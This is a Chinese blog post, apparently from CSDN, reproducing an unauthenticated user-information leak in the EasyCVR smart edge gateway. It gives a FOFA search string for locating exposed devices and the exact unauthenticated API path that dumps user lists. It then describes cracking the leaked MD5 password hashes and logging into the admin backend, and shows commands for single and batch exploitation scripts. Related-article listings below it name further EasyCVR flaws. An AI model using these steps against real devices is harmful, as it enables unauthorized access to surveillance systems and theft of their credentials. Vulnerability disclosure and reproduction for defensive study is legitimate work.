EasyCVR智能边缘网关未授权访问用户信息泄露漏洞

最新推荐文章于 2025-08-01 10:54:28 发布
原创 最新推荐文章于 2025-08-01 10:54:28 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

一、漏洞描述

EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍,对异常情况进行智能提醒和通知,可广泛应用于安防监控、智能检测、通行核验等场景。

EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。

二、网络空间搜索引擎查询

fofa查询

title="EasyCVR"

三、漏洞复现

poc

或浏览器直接访问路径 /api/v1/userlist?pageindex=0&pagesize=10

然后将md5加密后的密码解密

然后使用上面的Name 值作为用户名登录

四、批量检测与利用

单个检测

 python .\EasyCVR.py -u ip:port

批量检测

 python .\EasyCVR.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231010 获取批量检测利用脚本

漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞
晚风不及你
02-08 1021
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。
EasyCVR-视频管理平台 taillog 任意文件读取漏洞复现
0xSec
12-06 677
EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
EasyCVR 视频管理平台存在用户信息泄露[附批量POC]
Liyu_6618的博客
02-08 852
EasyCVR 视频管理平台存在用户信息泄露[附批量POC]
漏洞复现--EasyCVR智能边缘网关未授权访问
qq_53003652的博客
10-10 562
EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。该设备userlist接口存在信息泄露,攻击者可获得md5加密后的密码以进行后续测试。–EasyCVR智能边缘网关
EasyCVR智能边缘网关用户信息泄漏漏洞
weixin_44304678的博客
11-02 456
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
视频监控汇聚平台EasyCVR未授权访问用户信息泄漏复现 [附POC]
薛定谔嘚喵博客
10-26 549
EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
EasyCVR智能边缘网关+EasyGBS国标云平台助力智慧环保.docx
10-26
一种是当4G硬盘录像机未定制WiFi功能时,通过有线方式与EasyCVR智能边缘网关连接,并额外安装4G路由器实现外网连接;另一种则是当4G硬盘录像机已定制WiFi功能时,EasyCVR智能边缘网关也定制WiFi功能,直接通过WiFi...
【物联网技术】人工智能边缘网关关键技术及多领域应用:开启智能新时代的桥梁人工智能边缘网关
05-20
内容概要:本文详细介绍了人工智能边缘网关的概念、核心技术、独特优势及其在多个领域的应用案例。人工智能边缘网关是一种集成了边缘计算与人工智能技术的智能设备,它连接物理设备与云端,实现实时数据处理和智能化...
浅谈“未授权访问漏洞
热门推荐
→_→
07-26 1万+
一:漏洞名称: 未授权访问漏洞 描述: 未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。 检测条件: 已知Web网站具有登录页面。或者具有不允许访问的目录或功能。 不用登录,可通过链接直接访问用户页面功能。 检测方法: 通过对登录后的页面进行抓包,将抓取到的功能链接,在其他浏览器进行打开, 也可以通过web扫描工具进行扫描,爬虫得到相关地址链接,进.
EasyCVR视频管理平台 未授权访问漏洞复现
10-18 929
EasyCVR是一款智能、全面的安防视频监控平台,由青犀视频的TSINGSEE团队开发和维护。该平台旨在帮助大中型用户实现跨区域网络化视频监控的集中管理,具有信息资源管理、设备管理、用户管理、网络管理以及安全管理等一系列功能。
【0day漏洞复现】EasyCVR 视频管理平台存在信息泄露漏洞
qq_34780861的博客
05-15 992
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
EasyCVR 视频管理平台存在用户信息泄露(含批量验证poc)
weixin_43567873的博客
04-18 272
EasyCVR 视频管理平台存在用户信息泄露(含批量验证poc)
漏洞复现 一 EasyCVR-taillog任意文件读取
m0_63512120的博客
12-19 687
EasyCVR视频管理平台,作为TSINGSEE青犀视频旗下的一款重要产品,是一款功能强大的视频融合+AI智能分析网关平台。平台基于分布式、负载均衡等流媒体技术,提供广泛兼容、安全可靠、开放共享的视频综合服务。它支持多协议的设备视频接入、采集、AI智能检测、处理、分发、管理等服务,并具备轻量化接入、传输、处理与分发能力,可实现一站式视频融合共享管理。支持RTSP、RTMP、GB28181、GB35114、海康Ehome、大华SDK、海康SDK等多种协议的视频设备接入,兼容市面上几乎所有视频终端。
【FAQ】安防监控系统/视频云存储EasyCVR平台安全检查Proxy出现sql injection的漏洞,该如何修改?
AI与流媒体视频技术
09-21 277
视频云存储/安防监控EasyCVR视频汇聚平台基于云边端智能协同,支持海量视频的轻量化接入与汇聚、转码与处理、全网智能分发、视频集中存储等。
EasyCVR加密机授权出现报错问题的排查解决及注意事项
EasyCVR视频融合云平台的技术博客
09-13 295
如有用户出现上述同样的情况,可参照该方法进行配置。若有无法解决的问题,可联系我们协助排查。
EasyCVR taillog存在任意文件读取漏洞
缘梦未来的博客
12-08 321
EasyCVR视频管理平台,作为TSINGSEE青犀视频旗下的一款重要产品,是一款功能强大的视频融合+AI智能分析网关平台。平台基于分布式、负载均衡等流媒体技术,提供广泛兼容、安全可靠、开放共享的视频综合服务。它支持多协议的设备视频接入、采集、AI智能检测、处理、分发、管理等服务,并具备轻量化接入、传输、处理与分发能力,可实现一站式视频融合共享管理。支持RTSP、RTMP、GB28181、GB35114、海康Ehome、大华SDK、海康SDK等多种协议的视频设备接入,兼容市面上几乎所有视频终端。
视频融合平台EasyCVR激活码授权不成功的原因排查与解决
EasyCVR视频融合云平台的技术博客
06-27 291
在平台运行正常,且授权信息准确的条件下,用户若出现授权无效的情况,可以先确认服务器时间是否正确。
EasyCVR 视频管理平台getbaseconfig 存在信息泄露(CVE-2025-1595)
最新发布
m0_50125527的博客
08-01 162
本文档所述漏洞详情及复现方法仅限用于合法授权的安全研究和学术教育用途。任何个人或组织不得利用本文内容从事未经许可的或其他违法行为。使用者应确保其行为符合相关法律法规,并取得目标系统的明确授权。对于因不当使用本文信息而造成的任何直接或间接后果,作者概不负责。若您发现本文内容涉及侵权或不当信息,请及时联系我们,我们将立即核实并采取必要措施。
EasyCVR 视频管理平台adduser接口任意用户添加漏洞复现 [附POC]
薛定谔嘚喵博客
12-26 448
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务。EasyCVR 视频管理平台adduser接口存在任意用户添加漏洞
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值